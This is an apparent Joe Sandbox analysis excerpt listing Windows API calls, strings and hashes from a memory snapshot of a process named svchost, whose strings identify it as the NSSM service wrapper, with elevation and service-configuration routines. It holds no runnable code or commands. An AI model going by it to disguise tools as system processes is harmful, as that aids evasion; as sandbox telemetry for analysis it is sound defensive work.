                                                    • Process32FirstW.KERNEL32 ref: 0040A776
                                                    • GetLastError.KERNEL32(00000000), ref: 0040A780
                                                    • Process32NextW.KERNEL32(00000000,?), ref: 0040A7C2
                                                    • Process32NextW.KERNEL32(00000000,?), ref: 0040A807
                                                    • GetLastError.KERNEL32(?,00000000,?,?,00000002,00000000), ref: 0040A816
                                                    • GetLastError.KERNEL32(00000000,?,00000000,?,?,00000002,00000000), ref: 0040A81F
                                                    • CloseHandle.KERNEL32(00000000,?,00000000,?,?,00000002,00000000), ref: 0040A83C
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.1347748964.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000005.00000002.1347735341.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.1347768887.000000000041D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.1347786260.0000000000422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.1347801041.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_400000_svchost.jbxd
                                                    Similarity
                                                    • API ID: ErrorLast$CloseEventHandleProcess32__snwprintf_s$NextProcessSource$CodeCreateDeregisterExitFirstOpenRegisterReportSnapshotToolhelp32__vsnwprintf_s_l_memset
                                                    • String ID: %lu$AppStopMethodSkip$NSSM
                                                    • API String ID: 876000941-153837258
                                                    • Opcode ID: 87d6cd8ad363924e11445b902c5b866b416526b6275c1319dbaef4f3e386f7b6
                                                    • Instruction ID: 9356f86b261df9c84ccaf74e0b1af484dc6ccdd0321f5befb0d5a42ea0511750
                                                    • Opcode Fuzzy Hash: 87d6cd8ad363924e11445b902c5b866b416526b6275c1319dbaef4f3e386f7b6
                                                    • Instruction Fuzzy Hash: A061C8F15043007BE220A7519D8AFFB736CDF94708F50892EFA49A21C3F6B89515867B
                                                    APIs
                                                    • GetProcessHeap.KERNEL32(00000000,?,?,?,?), ref: 0041171B
                                                    • HeapFree.KERNEL32(00000000,?,?,?), ref: 00411722
                                                    • GetProcessHeap.KERNEL32(00000000,?,?,?,?,?), ref: 00411750
                                                    • GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,?,?,?), ref: 00411790
                                                    • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?), ref: 00411793
                                                    • GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,?,?,?), ref: 004117A0
                                                    • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?), ref: 004117A3
                                                    • HeapAlloc.KERNEL32(00000000,?,?,?,?), ref: 00411753
                                                      • Part of subcall function 00405470: _vfwprintf.LIBCMT ref: 0040548F
                                                      • Part of subcall function 00405470: LocalFree.KERNELBASE(00000000,?,?,?,00000000,00000000), ref: 00405498
                                                    • GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,?,?), ref: 00411813
                                                    • HeapFree.KERNEL32(00000000,?,?,?,?,?,?), ref: 00411816
                                                    • GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,?,?), ref: 00411823
                                                    • HeapFree.KERNEL32(00000000,?,?,?,?,?,?), ref: 00411826
                                                    • GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,?,?), ref: 00411833
                                                    • HeapFree.KERNEL32(00000000,?,?,?,?,?,?), ref: 00411836
                                                    • ChangeServiceConfigW.ADVAPI32(?,000000FF,000000FF,000000FF,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 0041185A
                                                    • GetLastError.KERNEL32 ref: 00411864
                                                    • GetProcessHeap.KERNEL32(00000000,?), ref: 00411895
                                                    • HeapFree.KERNEL32(00000000), ref: 0041189C
                                                    • GetProcessHeap.KERNEL32(00000000,?), ref: 004118B5
                                                    • HeapFree.KERNEL32(00000000), ref: 004118BC
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.1347748964.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000005.00000002.1347735341.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.1347768887.000000000041D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.1347786260.0000000000422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.1347801041.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_400000_svchost.jbxd
                                                    Similarity
                                                    • API ID: Heap$FreeProcess$AllocChangeConfigErrorLastLocalService_vfwprintf
                                                    • String ID: dependencies$native_set_dependonservice
                                                    • API String ID: 2900453341-2849880886
                                                    • Opcode ID: eacf11b33cb2cc2d23edf79ce080d1b0cbbaad9b579bfd244ff4f5032ff0d319
                                                    • Instruction ID: c8f04e43e909d1bf12b9aa294be1e3cdf98767991595af7166a1449a2d8a3fce
                                                    • Opcode Fuzzy Hash: eacf11b33cb2cc2d23edf79ce080d1b0cbbaad9b579bfd244ff4f5032ff0d319
                                                    • Instruction Fuzzy Hash: 0E51D5B1A043016BE610EB65DC45FAB73DCEF84714F048629FA68D72E1EB78DC44C66A
                                                    APIs
                                                    • _memset.LIBCMT ref: 00406A39
                                                    • GetProcessHeap.KERNEL32 ref: 00406A56
                                                    • HeapAlloc.KERNEL32(00000000), ref: 00406A59
                                                    • _memset.LIBCMT ref: 00406A74
                                                    • LocalFree.KERNEL32(00000000,?,?,?,?,?,?,00000000,00000200), ref: 00406AD9
                                                    • __snwprintf_s.LIBCMT ref: 00406AFC
                                                    • __snwprintf_s.LIBCMT ref: 00406AB8
                                                      • Part of subcall function 00412731: __vsnwprintf_s_l.LIBCMT ref: 00412748
                                                    • GetProcessHeap.KERNEL32(00000000,0000FFFE), ref: 00406B48
                                                    • HeapAlloc.KERNEL32(00000000), ref: 00406B4B
                                                    • __snwprintf_s.LIBCMT ref: 00406B81
                                                    • __snwprintf_s.LIBCMT ref: 00406BA5
                                                      • Part of subcall function 00405370: GetUserDefaultLangID.KERNEL32(00401059,0000FFFF,00000000,?,?,?,0040547B,40000206,?,00401059,-00000040,40000206,00000000,00000000), ref: 0040537F
                                                      • Part of subcall function 00405370: FormatMessageW.KERNELBASE(00000B00,00000000,0040547B,?,?,?,?,0040547B,40000206,?,00401059,-00000040,40000206,00000000,00000000), ref: 0040539B
                                                      • Part of subcall function 00405370: FormatMessageW.KERNEL32(00000B00,00000000,0040547B,00000000,00401059,0000FFFF,00000000,?,?,?,?,0040547B,40000206,?,00401059,-00000040), ref: 004053B4
                                                      • Part of subcall function 00405370: GetProcessHeap.KERNEL32(00000000,00000040,?,?,?,?,0040547B,40000206,?,00401059,-00000040,40000206,00000000,00000000), ref: 004053BD
                                                      • Part of subcall function 00405370: HeapAlloc.KERNEL32(00000000,?,?,?,?,0040547B,40000206,?,00401059,-00000040,40000206,00000000,00000000), ref: 004053C4
                                                      • Part of subcall function 00405370: __snwprintf_s.LIBCMT ref: 004053DC
                                                    • GetOpenFileNameW.COMDLG32(?,00000200), ref: 00406BD6
                                                    • SendMessageW.USER32(?,0000000C,00000000,?), ref: 00406C03
                                                    • GetProcessHeap.KERNEL32(00000000,?), ref: 00406C1A
                                                    • HeapFree.KERNEL32(00000000), ref: 00406C1D
                                                    • GetProcessHeap.KERNEL32(00000000,?), ref: 00406C2A
                                                    • HeapFree.KERNEL32(00000000), ref: 00406C2D
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.1347748964.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000005.00000002.1347735341.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.1347768887.000000000041D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.1347786260.0000000000422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.1347801041.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_400000_svchost.jbxd
                                                    Similarity
                                                    • API ID: Heap$Process__snwprintf_s$AllocFreeMessage$Format_memset$DefaultFileLangLocalNameOpenSendUser__vsnwprintf_s_l
                                                    • String ID: :%s:$X
                                                    • API String ID: 4223584720-3643568712
                                                    • Opcode ID: 6f6cb0b89cacafe10d1f1f8fd1946d6e639445887778fbb56b134f867ee11a65
                                                    • Instruction ID: 2fb1f1ec6dd78cf9b56019ed523e1d5e6dfd49e8e4e2ad70138c12666923ebb1
                                                    • Opcode Fuzzy Hash: 6f6cb0b89cacafe10d1f1f8fd1946d6e639445887778fbb56b134f867ee11a65
                                                    • Instruction Fuzzy Hash: 725103B1A043016BE610EB24CC45FAB77A8EF84754F140A3DFD55A73C1DB78E914CA9A
                                                    APIs
                                                      • Part of subcall function 00405470: _vfwprintf.LIBCMT ref: 0040548F
                                                      • Part of subcall function 00405470: LocalFree.KERNELBASE(00000000,?,?,?,00000000,00000000), ref: 00405498
                                                    • _memset.LIBCMT ref: 004099BD
                                                    • GetProcessHeap.KERNEL32 ref: 004099E2
                                                    • HeapAlloc.KERNEL32(00000000), ref: 004099EB
                                                    • GetModuleFileNameW.KERNEL32(00000000,00000000,00007FFF), ref: 00409A28
                                                    • GetProcessHeap.KERNEL32(00000008,0000FFFE), ref: 00409A35
                                                    • HeapAlloc.KERNEL32(00000000), ref: 00409A38
                                                    • GetProcessHeap.KERNEL32(00000000,?), ref: 00409A46
                                                    • HeapFree.KERNEL32(00000000), ref: 00409A49
                                                    • GetCommandLineW.KERNEL32 ref: 00409A5B
                                                    • __snwprintf_s.LIBCMT ref: 00409A6F
                                                      • Part of subcall function 00412731: __vsnwprintf_s_l.LIBCMT ref: 00412748
                                                    • ShellExecuteExW.SHELL32 ref: 00409AD9
                                                    • GetProcessHeap.KERNEL32(00000000,?), ref: 00409AED
                                                    • HeapFree.KERNEL32(00000000), ref: 00409AF6
                                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00409AFB
                                                    • HeapFree.KERNEL32(00000000), ref: 00409AFE
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.1347748964.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000005.00000002.1347735341.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.1347768887.000000000041D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.1347786260.0000000000422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.1347801041.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_400000_svchost.jbxd
                                                    Similarity
                                                    • API ID: Heap$Process$Free$Alloc$CommandExecuteFileLineLocalModuleNameShell__snwprintf_s__vsnwprintf_s_l_memset_vfwprintf
                                                    • String ID: <$GetCommandLine()$GetModuleFileName()$elevate()
                                                    • API String ID: 973368859-4193039769
                                                    • Opcode ID: 900e8c87ca2aa9aec742fd558df0281ba4947d5c9c9fdbed743180e08cd3c412
                                                    • Instruction ID: 7ae2c759de92c54c39a002a946b74eb1e22cb2beefd2f70ccc6c30d9fe699ef8
                                                    • Opcode Fuzzy Hash: 900e8c87ca2aa9aec742fd558df0281ba4947d5c9c9fdbed743180e08cd3c412
                                                    • Instruction Fuzzy Hash: 673128F1E043027AD310ABA5CC46FA77798EF84704F00452AF945E72C1DBBCE9448BA9
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.1347748964.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000005.00000002.1347735341.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.1347768887.000000000041D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.1347786260.0000000000422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.1347801041.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_400000_svchost.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: SeServiceLogonRight
                                                    • API String ID: 0-347471591
                                                    • Opcode ID: d1ec01c29beff1dc2b7cf4a31634801e6b38091671ebd8c69d5d4f8db8eefe16
                                                    • Instruction ID: 1588cd9aa28459d6f698114f179f5034525e64d227a869bba66d549dab2bd090
                                                    • Opcode Fuzzy Hash: d1ec01c29beff1dc2b7cf4a31634801e6b38091671ebd8c69d5d4f8db8eefe16
                                                    • Instruction Fuzzy Hash: D751D9F29003016BC210FB659C82A9F73A9EFC4758F44493EF845D3262E63CDA55C7AA
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.1347748964.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000005.00000002.1347735341.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.1347768887.000000000041D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.1347786260.0000000000422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.1347801041.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_400000_svchost.jbxd
                                                    Similarity
                                                    • API ID: QueryValue
                                                    • String ID: All$affinity$setting_get_affinity
                                                    • API String ID: 3660427363-3501811323
                                                    • Opcode ID: aadf3678ba3ec564ff7923484b1f3c659c44b9ba2d0e62d742e643e475440171
                                                    • Instruction ID: 39c13d5f00e9b419edd27a44e9b0f75dfecbdf5c9278ee4873767282b9cc75a7
                                                    • Opcode Fuzzy Hash: aadf3678ba3ec564ff7923484b1f3c659c44b9ba2d0e62d742e643e475440171
                                                    • Instruction Fuzzy Hash: 7041C9B1B042007BE600A779DC45FAF77DCEFC4729F840A5AF558D22D1D6B8DC848A66
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.1347748964.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000005.00000002.1347735341.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.1347768887.000000000041D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.1347786260.0000000000422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.1347801041.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_400000_svchost.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 1b78011fbee3aa40aefb94b04e9307e1ddbd925d910803d0c7f55a23a13cb692
                                                    • Instruction ID: 4a1410ef1443eea10fe89477afcc143de1e533fa6ee3b316fa2d910530bd4db7
                                                    • Opcode Fuzzy Hash: 1b78011fbee3aa40aefb94b04e9307e1ddbd925d910803d0c7f55a23a13cb692
                                                    • Instruction Fuzzy Hash: 4661DCB1A84302BBE101A7509C06FFB7398EB94B44F01443AF7527A0C2DBBC56558BAF
                                                    APIs
                                                    • QueryServiceConfig2W.ADVAPI32(00000000,00000001,00000000,00000000,00003FFF,00000000,00008418,00000402), ref: 0040D547
                                                    • GetLastError.KERNEL32 ref: 0040D549
                                                    • GetProcessHeap.KERNEL32(00000000,00003FFF,00000000,00000000), ref: 0040D567
                                                    • HeapAlloc.KERNEL32(00000000), ref: 0040D56A
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.1347748964.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000005.00000002.1347735341.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.1347768887.000000000041D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.1347786260.0000000000422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.1347801041.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_400000_svchost.jbxd
                                                    Similarity
                                                    • API ID: Heap$AllocConfig2ErrorLastProcessQueryService
                                                    • String ID: SERVICE_CONFIG_DESCRIPTION$get_service_description()
                                                    • API String ID: 2527037045-119971955
                                                    • Opcode ID: 9949ae250d6f60cbc6c2d3ad254c89fe22e4bd7663aaf79f323aa80c9ae87168
                                                    • Instruction ID: 3e5ba4e39e1bc183658cdb8e0b0057f10ea9e025a726a76105c97a4cff3da096
                                                    • Opcode Fuzzy Hash: 9949ae250d6f60cbc6c2d3ad254c89fe22e4bd7663aaf79f323aa80c9ae87168
                                                    • Instruction Fuzzy Hash: 103137F2A413017BE200A7A6EC46FEBB35CDF95729F10052AF509E61C1DAB9D840866A
                                                    APIs
                                                    • GetProcessHeap.KERNEL32(00000000,?,?,?,00000001,00000000), ref: 0040ACEC
                                                    • HeapAlloc.KERNEL32(00000000), ref: 0040ACF3
                                                    • _memset.LIBCMT ref: 0040AD2C
                                                    • RegQueryValueExW.ADVAPI32 ref: 0040AD57
                                                    • GetLastError.KERNEL32 ref: 0040AD63
                                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 0040AD6E
                                                    • HeapFree.KERNEL32(00000000), ref: 0040AD75
                                                      • Part of subcall function 00405400: RegisterEventSourceW.ADVAPI32(00000000,nssm), ref: 0040540B
                                                      • Part of subcall function 00405400: ReportEventW.ADVAPI32(00000000,?,00000000), ref: 00405459
                                                      • Part of subcall function 00405400: DeregisterEventSource.ADVAPI32(00000000), ref: 00405460
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.1347748964.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000005.00000002.1347735341.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.1347768887.000000000041D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.1347786260.0000000000422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.1347801041.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_400000_svchost.jbxd
                                                    Similarity
                                                    • API ID: Heap$Event$ProcessSource$AllocDeregisterErrorFreeLastQueryRegisterReportValue_memset
                                                    • String ID: get_string()
                                                    • API String ID: 2603871056-896229945
                                                    • Opcode ID: 56f8c6b17a97cf912f3af75bb16579b71339ad1f642ff53764c85366f89547bd
                                                    • Instruction ID: 72e98944cf36b2bbc6af698ef9dc07420c8870f262d0e465f671d630dce17b03
                                                    • Opcode Fuzzy Hash: 56f8c6b17a97cf912f3af75bb16579b71339ad1f642ff53764c85366f89547bd
                                                    • Instruction Fuzzy Hash: 154115B19043006BE310AB58EC09FEB7B9CEF8471AF44457AF549A2182D7B9C954C6AB
                                                    APIs
                                                    • GetCurrentProcess.KERNEL32(?,?), ref: 00410980
                                                    • GetProcessAffinityMask.KERNEL32(00000000), ref: 00410987
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.1347748964.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000005.00000002.1347735341.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.1347768887.000000000041D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.1347786260.0000000000422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.1347801041.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_400000_svchost.jbxd
                                                    Similarity
                                                    • API ID: Process$AffinityCurrentMask
                                                    • String ID: All
                                                    • API String ID: 1231390398-55916349
                                                    • Opcode ID: 3cc79894fb783cbacc77b87bc96894dd0151df03ecdf7f3147d36d3e41e83904
                                                    • Instruction ID: 4f50b5df6772471c36ec06a59c3137138f5c5bb65052f92276dbeda9fd140f86
                                                    • Opcode Fuzzy Hash: 3cc79894fb783cbacc77b87bc96894dd0151df03ecdf7f3147d36d3e41e83904
                                                    • Instruction Fuzzy Hash: 0371E5B29043016BD710DF69DC85AAB77E8EFC4358F444A2EF944D3341E678ED848B6A
                                                    APIs
                                                    • GetSystemTime.KERNEL32(?), ref: 004089E3
                                                    • CreateFileW.KERNEL32(?,00000000,00000007,00000000,00000003,00000080,00000000), ref: 004089F8
                                                    • GetFileInformationByHandle.KERNEL32(00000000,?), ref: 00408A0E
                                                    • SystemTimeToFileTime.KERNEL32(?,?), ref: 00408A32
                                                    • CloseHandle.KERNEL32(00000000), ref: 00408A49
                                                    • SystemTimeToFileTime.KERNEL32(?,?), ref: 00408A5D
                                                    • CompareFileTime.KERNEL32(?,?,?,00000000,FF676980,000000FF), ref: 00408A90
                                                    • FileTimeToSystemTime.KERNEL32(?,?), ref: 00408AD6
                                                    • MoveFileW.KERNEL32(?,?), ref: 00408AF7
                                                    • GetLastError.KERNEL32 ref: 00408B1D
                                                    • SystemTimeToFileTime.KERNEL32(?,?), ref: 00408B54
                                                    • GetLastError.KERNEL32 ref: 00408B5F
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.1347748964.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000005.00000002.1347735341.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.1347768887.000000000041D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.1347786260.0000000000422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.1347801041.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_400000_svchost.jbxd
                                                    Similarity
                                                    • API ID: Time$File$System$ErrorHandleLast$CloseCompareCreateInformationMove
                                                    • String ID: CreateFile()$MoveFile()
                                                    • API String ID: 1279283993-2404744241
                                                    • Opcode ID: 25552cb11b5ace56ecd3b2e5a937ca093c4a3363743169b4a7c3585eb8c3d0c6
                                                    • Instruction ID: dbd175fc6890c416a4f9d1aeb2e25f209b5034f3b8b6a35462ec3c9fcbbef7c3
                                                    • Opcode Fuzzy Hash: 25552cb11b5ace56ecd3b2e5a937ca093c4a3363743169b4a7c3585eb8c3d0c6
                                                    • Instruction Fuzzy Hash: 7951B2B1604300AFD321DF50DD85EEF77A8FF88704F44492EF6C992181DB78A9448B6A
                                                    APIs
                                                    • __snwprintf_s.LIBCMT ref: 00410665
                                                    • RegDeleteValueW.ADVAPI32(00000000,?), ref: 00410678
                                                    • RegCloseKey.ADVAPI32(00000000), ref: 00410681
                                                    • __snwprintf_s.LIBCMT ref: 004106E3
                                                    • __wcsnicmp.LIBCMT ref: 0041070C
                                                    • _fwprintf.LIBCMT ref: 0041075F
                                                    • RegSetValueExW.ADVAPI32(00000000,?,00000000,00000001,?,?), ref: 004107D2
                                                    • GetLastError.KERNEL32(?,?), ref: 004107DC
                                                    • RegCloseKey.ADVAPI32(00000000,?,?,?,?,?,?), ref: 00410809
                                                    • RegCloseKey.ADVAPI32(00000000,?,?), ref: 00410815
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.1347748964.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000005.00000002.1347735341.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.1347768887.000000000041D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.1347786260.0000000000422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.1347801041.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_400000_svchost.jbxd
                                                    Similarity
                                                    • API ID: Close$Value__snwprintf_s$DeleteErrorLast__wcsnicmp_fwprintf
                                                    • String ID: %s$default
                                                    • API String ID: 3151773479-387093873
                                                    • Opcode ID: a3eb8f7cbf097436222cf15ca32937873149e64d54cf7f047a34555ee42af66f
                                                    • Instruction ID: 30a3df3cfbea9975472b600d8026b2d659796aa5a5751022936202a7496980d0
                                                    • Opcode Fuzzy Hash: a3eb8f7cbf097436222cf15ca32937873149e64d54cf7f047a34555ee42af66f
                                                    • Instruction Fuzzy Hash: 5F613BB1A043006BD210AB65DD46FEB73989F84308F44452AF95592282F7FCE9D5CAAE
                                                    APIs
                                                      • Part of subcall function 0040D950: GetProcessHeap.KERNEL32(00000008,00070510,?,00406684), ref: 0040D958
                                                      • Part of subcall function 0040D950: HeapAlloc.KERNEL32(00000000,?,00406684), ref: 0040D95F
                                                    • __snwprintf_s.LIBCMT ref: 004100BB
                                                      • Part of subcall function 00412731: __vsnwprintf_s_l.LIBCMT ref: 00412748
                                                    • RegisterServiceCtrlHandlerExW.ADVAPI32(NSSM,0040F310,00000000), ref: 0041016B
                                                    • GetLastError.KERNEL32(00000000), ref: 0041017C
                                                      • Part of subcall function 00405400: RegisterEventSourceW.ADVAPI32(00000000,nssm), ref: 0040540B
                                                      • Part of subcall function 00405400: ReportEventW.ADVAPI32(00000000,?,00000000), ref: 00405459
                                                      • Part of subcall function 00405400: DeregisterEventSource.ADVAPI32(00000000), ref: 00405460
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.1347748964.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000005.00000002.1347735341.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.1347768887.000000000041D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.1347786260.0000000000422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.1347801041.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_400000_svchost.jbxd
                                                    Similarity
                                                    • API ID: Event$HeapRegisterSource$AllocCtrlDeregisterErrorHandlerLastProcessReportService__snwprintf_s__vsnwprintf_s_l
                                                    • String ID: NSSM$service->name$service_main()
                                                    • API String ID: 4131733493-2082882489
                                                    • Opcode ID: 6ac95fc9643b6a64bb1cb5c6de92dade781988db5d66d8b08e3ebf056326ab07
                                                    • Instruction ID: 09d4c8929dcbfacbdd4c1d483c8683e469f37797597802ee5f3465e219f8d35a
                                                    • Opcode Fuzzy Hash: 6ac95fc9643b6a64bb1cb5c6de92dade781988db5d66d8b08e3ebf056326ab07
                                                    • Instruction Fuzzy Hash: 3851A8F1E40700EFD320AF759C46BD77BA8AB44319F40853FF65E96242D2BD68848B69
                                                    APIs
                                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 0041219F
                                                    • HeapFree.KERNEL32(00000000), ref: 004121A6
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.1347748964.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000005.00000002.1347735341.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.1347768887.000000000041D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.1347786260.0000000000422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.1347801041.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_400000_svchost.jbxd
                                                    Similarity
                                                    • API ID: Heap$FreeProcess
                                                    • String ID: %s$LocalSystem$SERVICE_INTERACTIVE_PROCESS$SERVICE_WIN32_OWN_PROCESS
                                                    • API String ID: 3859560861-1492594695
                                                    • Opcode ID: 33fa03d751a25fb42394721696a2fbae633dc317f90b51ed7800875141e1fc40
                                                    • Instruction ID: ce946582b93cb946955dea2ec205cb75b91bbb2897729394130ecaaa05bb3734
                                                    • Opcode Fuzzy Hash: 33fa03d751a25fb42394721696a2fbae633dc317f90b51ed7800875141e1fc40
                                                    • Instruction Fuzzy Hash: E231C3B3D4420137E6006676BC4AFDB73089F51339F140627F924E62C2FAB9DCD186A9
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.1347748964.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000005.00000002.1347735341.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
